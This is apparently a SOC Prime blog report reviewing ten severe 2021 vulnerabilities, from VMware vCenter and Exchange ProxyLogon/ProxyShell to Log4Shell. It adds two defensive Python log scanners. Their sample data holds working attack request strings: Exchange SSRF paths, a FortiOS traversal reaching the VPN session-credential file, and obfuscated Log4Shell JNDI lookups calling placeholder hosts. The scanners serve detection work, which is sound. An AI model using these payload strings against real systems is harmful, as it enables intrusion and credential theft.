The Top 10 Most Severe Vulnerabilities In 2021

Brought to you by SOCPrime

The past few years brought a radical shift online. The global acceleration of digital processes inevitably set the stage for a growing number of cyber threats and their ever-growing sophistication. To back this statement up with evidence, it is worth looking back at the top cybersecurity exploits and incidents of 2020 and the lessons the past year brought to the industry, as put together in the SOC Prime report.

As for 2021, the statistics are disturbing: security experts report about 18,582 vulnerabilities (CVEs) caught so far this year, compared to 17,041 detected in 2020. Moreover, 2021 was marked by a significant increase in reported zero-days: at least 66 zero-day issues have been publicly revealed this year, double the number identified in 2020.

Those numbers put more strain on security practitioners who are already struggling to keep pace with timely threat detection and software patching. The savviest are turning to the world's largest Threat Detection Marketplace powered by SOC Prime, which delivers over 130K curated Sigma-based content items to identify critical threats challenging businesses, including detection algorithms for all of the high-severity CVEs listed below. Security teams can convert them from the generic Sigma standard to 20+ SIEM, EDR & XDR formats using the platform's built-in automation or with the help of Uncoder.io, a free online tool for on-the-fly content translation.

Under these circumstances, cybersecurity awareness matters more than ever. This report, based on CISA findings and recommendations as well as SOC Prime research, highlights the ten most severe vulnerabilities and exposures of 2021, affecting a broad spectrum of products from VMware, Microsoft, Apache, Pulse Secure, Fortinet, and F5 BIG-IP, to help make sure you have not missed anything.

1.    Critical Unauthenticated Remote Code Execution in VMware vCenter (CVE-2021-21972)

On February 23, 2021, VMware announced that the vSphere Client (HTML5) contained a remote code execution vulnerability in a vCenter Server plugin.

●    The bug, if unpatched, allows an unauthenticated attacker with network access to port 443 to send a specially crafted request and execute arbitrary commands on the underlying operating system that hosts vCenter Server.
●    Attackers who exploit it gain access to the compromised virtualization environment and the sensitive data it manages.

2.    Microsoft Exchange ProxyLogon Attack (CVE-2021-26857, CVE-2021-26855, CVE-2021-26858, CVE-2021-27065)

On March 2, 2021, Microsoft released out-of-band security updates for four critical vulnerabilities in Microsoft Exchange Server: CVE-2021-26857, CVE-2021-26855, CVE-2021-26858, and CVE-2021-27065. The chain, commonly referred to as ProxyLogon, remains the most well-known and impactful Exchange exploit.

●    Exploited together, the flaws let a threat actor bypass authentication (via the CVE-2021-26855 server-side request forgery), impersonate an administrator, and write arbitrary files to the server.
●    The majority of attacks were aimed at uploading an initial web shell to the server for follow-on malicious actions.

3.    Critical Vulnerabilities in F5 BIG-IP, BIG-IQ (CVE-2021-22986, CVE-2021-22987, CVE-2021-22991, CVE-2021-22992)

On March 10, 2021, F5 addressed four critical vulnerabilities in its BIG-IP and BIG-IQ products.

-    CVE-2021-22986, an unauthenticated remote code execution vulnerability in the iControl REST interface. Unauthenticated attackers could reach it through the BIG-IP management interface and self IP addresses to run arbitrary system commands, create or delete files, and disable services.
-    CVE-2021-22987, the highest-rated of the four (CVSS 9.9), is an authenticated remote code execution vulnerability in undisclosed pages of the Traffic Management User Interface (TMUI) when the system is running in Appliance mode.
-    CVE-2021-22991 is a buffer overflow in the Traffic Management Microkernel (TMM) URI normalization that can lead to denial of service (DoS) and potentially remote code execution on affected installations.
-    CVE-2021-22992, much like the previous one, is a buffer overflow (triggered by a malicious HTTP response to an Advanced WAF/ASM virtual server) that allows for DoS and potentially RCE, with the potential for complete system compromise.

4.    Multiple FortiOS Vulnerabilities (CVE-2018-13379, CVE-2019-5591, CVE-2020-12812)

In April 2021, CISA and the FBI published a joint advisory on three vulnerabilities in FortiOS, used in Fortinet SSL VPN, that advanced persistent threat actors had been observed scanning for. These vulnerabilities present the following threats:

-    CVE-2018-13379, a path traversal vulnerability in the SSL VPN web portal. Allows an unauthenticated attacker to download FortiOS system files, including the session file that holds plaintext credentials, via specially crafted HTTP resource requests.
-    CVE-2019-5591, a default-configuration weakness. Enables an unauthenticated attacker on the same subnet to intercept sensitive information by impersonating the LDAP server.
-    CVE-2020-12812, an improper-authentication flaw. Lets a user log in without being prompted for the second factor of authentication (FortiToken) if the case of the username is changed.

5.    Critical VMware vCenter Vulnerability (CVE-2021-21985)

On May 25, 2021, VMware reported that the vSphere Client (HTML5) had a remote code execution vulnerability due to a lack of input validation in the Virtual SAN (vSAN) Health Check plugin, which is enabled by default in vCenter Server.

●    When exploited, the vulnerability allows an adversary with network access to port 443 to execute arbitrary commands with unrestricted privileges on the underlying operating system that hosts vCenter Server.

6.    Ivanti Patches Critical Pulse Connect Secure Flaws (CVE-2021-22893, CVE-2021-22894, CVE-2021-22899, CVE-2021-22900)

Starting in June 2020 and continuing for almost a year, several threat groups deployed numerous malware families that exploited flaws in Ivanti's Pulse Connect Secure VPN appliances to gain access to government agencies, critical infrastructure entities, and private-sector organisations across the U.S. CVE-2021-22893, an authentication bypass, was exploited as a zero-day; Ivanti patched it together with CVE-2021-22894, CVE-2021-22899, and CVE-2021-22900 in May 2021.

●    Threat actors used this access to place web shells on the Pulse Connect Secure appliances for further access and persistence.
●    The known web shells support a variety of functions, including authentication bypass, multi-factor authentication bypass, password logging, and persistence that survives patching.

7.    Patch Bypass Vulnerability in Pulse Connect Secure (CVE-2021-22937)

This is a post-authentication remote code execution vulnerability in Pulse Connect Secure virtual private network (VPN) appliances. Reported in 2021 and fixed by Ivanti in August 2021, it bypasses the patch issued in October 2020 for CVE-2020-8260, a notorious bug that allowed RCE with root privileges.

●    If exploited, the vulnerability allows an authenticated user with administrator rights to overwrite arbitrary files via a crafted archive uploaded through the administrator web interface, leading to code execution as root.
●    Attackers can use it to plant a persistent backdoor on the appliance, through which the VPN's users and their sessions can be compromised.

8.    PrintNightmare Vulnerabilities (CVE-2021-1675/CVE-2021-34527)

In June 2021, the Windows PrintNightmare RCE vulnerability came to public attention. It had been known since earlier in 2021, but drew little attention at first because it was initially assessed as a local privilege escalation that posed limited risk. After a reassessment in the summer of 2021, the remote code execution variant was rated critical and assigned a separate identifier, CVE-2021-34527.

●    The vulnerability allowed an attacker with a regular, unprivileged domain user account to remotely take control of a server running the Windows Print Spooler service.
●    Successful exploitation lets an authenticated adversary abuse privileged file operations to execute arbitrary code with SYSTEM privileges.

Now that the dust has settled, there are official patches for each of the PrintNightmare flaws, CVE-2021-1675 and CVE-2021-34527. Microsoft also recommends disabling the Print Spooler service on systems that do not need it and restricting Point and Print driver installation to administrators, since the patches alone do not help where those settings remain permissive.

9.    Microsoft Exchange ProxyShell Attack (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207)

In August 2021, security researchers revealed another notorious set of Microsoft vulnerabilities, ProxyShell. This is an umbrella term covering three severe bugs:

-    CVE-2021-34473, a pre-authentication path confusion flaw that results in ACL bypass
-    CVE-2021-34523, an elevation of privilege flaw in the Exchange PowerShell backend
-    CVE-2021-31207, a post-authentication arbitrary file write

●    The flaws work in tandem, giving threat actors a way to execute arbitrary commands on Microsoft Exchange Server through an exposed port 443.
●    The flaws were fixed by Microsoft's security updates of April and May 2021 (the CVE identifiers for two of them were only published in July); however, over 30,000 Exchange servers reportedly remained vulnerable at the time of writing, motivating attackers to keep leveraging them.
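The request shapes behind ProxyLogon (item 2), ProxyShell (item 9), and the FortiOS path traversal (item 4) are all visible in ordinary web-server or reverse-proxy access logs, so a small scanner is a practical first check. The following is an added example written for this page, not SOC Prime's Sigma content or any vendor's detection logic: it parses constructed log lines in a simplified tab-separated format (client, method, URL as logged, status, Cookie header), URL-decodes the path twice to defeat encoding tricks, and flags the known indicators. The log entries and the evil.invalid host name are made up; the patterns summarise publicly reported exploit requests and will not catch every variant.

```python
"""
Access-log indicator scanner for ProxyLogon, ProxyShell and the FortiOS
SSL VPN path traversal. Example code written for this article; the log
format, log lines and host names are constructed.
"""
import re
from urllib.parse import unquote

# (label, pattern) pairs. The patterns summarise publicly reported request
# shapes for each CVE; they were written for this example, not copied from
# any vendor's detection content.
INDICATORS = [
    # ProxyShell: the "@host" after autodiscover.json is stripped by the
    # Exchange front end, which then forwards the rest of the path to a
    # backend endpoint such as /powershell or /mapi/nspi.
    ("ProxyShell CVE-2021-34473 path confusion",
     re.compile(r"/autodiscover/autodiscover\.json\?@[^/\s]+/"
                r"(?:powershell|mapi/nspi|ews/exchange\.asmx)", re.I)),
    # ProxyLogon: the SSRF is steered with backend-routing cookies that a
    # legitimate client never sends.
    ("ProxyLogon CVE-2021-26855 backend-routing cookie",
     re.compile(r"\b(?:X-BEResource|X-AnonResource-Backend)=", re.I)),
    # FortiOS SSL VPN: a lang= parameter carrying "../" to escape the
    # language directory.
    ("FortiOS CVE-2018-13379 path traversal",
     re.compile(r"/remote/fgt_lang\?lang=[^\s&]*\.\./", re.I)),
]


def normalise(url):
    """URL-decode twice so single- and double-encoded payloads look alike."""
    return unquote(unquote(url))


def parse(line):
    """Split one constructed line: client TAB method TAB url TAB status TAB cookie."""
    parts = line.rstrip("\n").split("\t")
    if len(parts) != 5:
        return None
    return parts


def scan(lines):
    """Return (line_no, client, label) for every indicator that matches a line."""
    hits = []
    for n, line in enumerate(lines, 1):
        rec = parse(line)
        if rec is None:
            continue
        client, _method, url, _status, cookie = rec
        # Match against the decoded URL and the raw Cookie header together.
        haystack = normalise(url) + "\n" + cookie
        for label, pattern in INDICATORS:
            if pattern.search(haystack):
                hits.append((n, client, label))
    return hits


SAMPLE_LOG = [  # constructed lines; evil.invalid is a placeholder host
    "198.51.100.7\tPOST\t/autodiscover/autodiscover.json?@evil.invalid/powershell/"
    "?X-Rps-CAT=AAAA&Email=autodiscover/autodiscover.json%3F@evil.invalid\t200\t",
    "198.51.100.8\tGET\t/autodiscover/autodiscover.json?@evil.invalid/mapi/nspi/"
    "?&Email=autodiscover/autodiscover.json%3F@evil.invalid\t200\t",
    "198.51.100.9\tPOST\t/ecp/y.js\t200\t"
    "X-BEResource=Administrator@mail.corp.example:444/ecp/proxyLogon.ecp?#~1941962753",
    "203.0.113.4\tGET\t/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession\t200\t",
    "203.0.113.5\tGET\t/remote/fgt_lang?lang=%2F..%2F..%2F..%2F..%2Fdev%2Fcmdb%2Fsslvpn_websession\t200\t",
    "10.0.0.12\tGET\t/autodiscover/autodiscover.json?Email=alice@corp.example\t200\t",
    "10.0.0.13\tGET\t/owa/auth/logon.aspx?url=https://mail.corp.example/owa/\t200\tOutlookSession=abc",
    "10.0.0.14\tGET\t/remote/login?lang=en\t200\t",
]

if __name__ == "__main__":
    for line_no, client, label in scan(SAMPLE_LOG):
        print(f"line {line_no}: {client} -> {label}")
```

Only the first five sample lines should fire; the legitimate Autodiscover, OWA logon and FortiGate login requests are left alone. A match is a reason to pull the corresponding server's own logs (Exchange HttpProxy logs, FortiGate event logs) and look for the follow-on activity described above, not proof of compromise on its own.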

10.    Critical vulnerability in Apache Log4j library aka Log4Shell or LogJam (CVE-2021-44228)

The vulnerability in the Java-based Apache Log4j logging library was publicly disclosed in early December 2021 (exploitation attempts were later traced back to December 1) and poses a critical risk to affected systems, with a CVSS score of 10.0.

●    If successfully exploited, it lets a threat actor make the vulnerable application fetch and execute arbitrary code from an attacker-controlled server through a JNDI lookup and, in some cases, gain full control of the host.
●    Adversaries have leveraged this flaw to install coin miners, DDoS bots, and Cobalt Strike implants, recruiting vulnerable devices into botnets and exfiltrating data from compromised machines.
●    Thousands of applications and services worldwide use the vulnerable Log4j library for routine logging.
●    Log4Shell could be weaponized for a self-propagating, worm-like outbreak on the scale of WannaCry.
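Detecting Log4Shell in logs is harder than searching for the string `${jndi:`, because Log4j 2 resolves nested lookups before the JNDI one runs: `${lower:J}` evaluates to `j`, and `${key:-default}` evaluates to `default` whenever `key` cannot be resolved, so `${${::-j}ndi:...}` or `${${env:NOPE:-j}ndi:...}` reach the JNDI handler exactly as `${jndi:...}` does. The added example below, written for this page rather than taken from the Log4j project or SOC Prime, implements enough of that lookup grammar to flatten the common obfuscations and then extracts the JNDI target. The sample log lines are constructed and attacker.invalid is a placeholder host.

```python
"""
Flatten Log4j 2-style nested lookups and pull out the JNDI target.
Example code written for this article; the lookup subset handled here
(lower, upper, and the ":-default" fallback) is the part attackers used
for obfuscation, not the full Log4j grammar.
"""
import re


def _find_close(s, start):
    """Index of the '}' closing the '${' at `start`, or -1 if unbalanced."""
    depth = 0
    k = start
    while k < len(s):
        if s.startswith("${", k):
            depth += 1
            k += 2
            continue
        if s[k] == "}":
            depth -= 1
            if depth == 0:
                return k
        k += 1
    return -1


def _lookup(inner):
    """Evaluate one already-flattened lookup body (the text between ${ and })."""
    key, sep, default = inner.partition(":-")
    prefix, _, arg = key.partition(":")
    prefix = prefix.lower()
    if prefix == "lower":
        return arg.lower()
    if prefix == "upper":
        return arg.upper()
    if prefix == "jndi":
        # Terminal lookup: keep it intact (prefix lower-cased) so the caller
        # can match on it regardless of the original casing.
        return "${jndi:" + inner[len(prefix) + 1:] + "}"
    if sep:
        # Unknown or empty key with a default: Log4j substitutes the default.
        return default
    # Anything else stays verbatim, which also guarantees termination.
    return "${" + inner + "}"


def resolve(s):
    """Recursively flatten nested lookups in s, innermost first."""
    out = []
    i = 0
    while i < len(s):
        if s.startswith("${", i):
            j = _find_close(s, i)
            if j == -1:
                out.append(s[i:])  # unbalanced: leave the tail as-is
                break
            out.append(_lookup(resolve(s[i + 2:j])))
            i = j + 1
        else:
            out.append(s[i])
            i += 1
    return "".join(out)


JNDI_RE = re.compile(r"\$\{jndi:([^}]*)\}", re.I)


def detect(lines):
    """Return (line_no, jndi_target) for each line that carries a JNDI lookup after flattening."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = JNDI_RE.search(resolve(line))
        if m:
            hits.append((n, m.group(1)))
    return hits


SAMPLE_LINES = [  # constructed access-log lines; the last field is the User-Agent
    '10.0.0.5 - - "GET /login HTTP/1.1" 200 "${jndi:ldap://attacker.invalid:1389/a}"',
    '10.0.0.6 - - "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://attacker.invalid/x}"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://attacker.invalid/o}"',
    '10.0.0.8 - - "GET / HTTP/1.1" 200 "${${env:NOPE:-j}ndi:dns://attacker.invalid/ping}"',
    '10.0.0.9 - - "GET / HTTP/1.1" 200 "${JNDI:LDAP://attacker.invalid/U}"',
    '10.0.0.10 - - "GET /api HTTP/1.1" 200 "Mozilla/5.0 (X11; Linux x86_64)"',
    '10.0.0.11 - - "GET /api HTTP/1.1" 200 "${date:yyyy-MM-dd}"',
]

if __name__ == "__main__":
    for line_no, target in detect(SAMPLE_LINES):
        print(f"line {line_no}: JNDI target {target}")
```

The first five lines are flagged and the two benign ones are not; a plain substring search for `${jndi:` would have caught only the first. In a real deployment, run the same flattening over every attacker-controlled field that can reach a log statement (headers, form fields, usernames), after URL-decoding, since the User-Agent header is only the best-known delivery vector.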

At the risk of sounding like a broken record, keeping a finger on the pulse of attack developments helps you understand the latest trends in the cyber threat landscape and sharpen your cyber defence skills. First, make sure all of the relevant vulnerabilities listed above are patched. Second, a shout-out to cyber researchers and enthusiasts: regularly monitor, and consider contributing to, threat detection platforms.
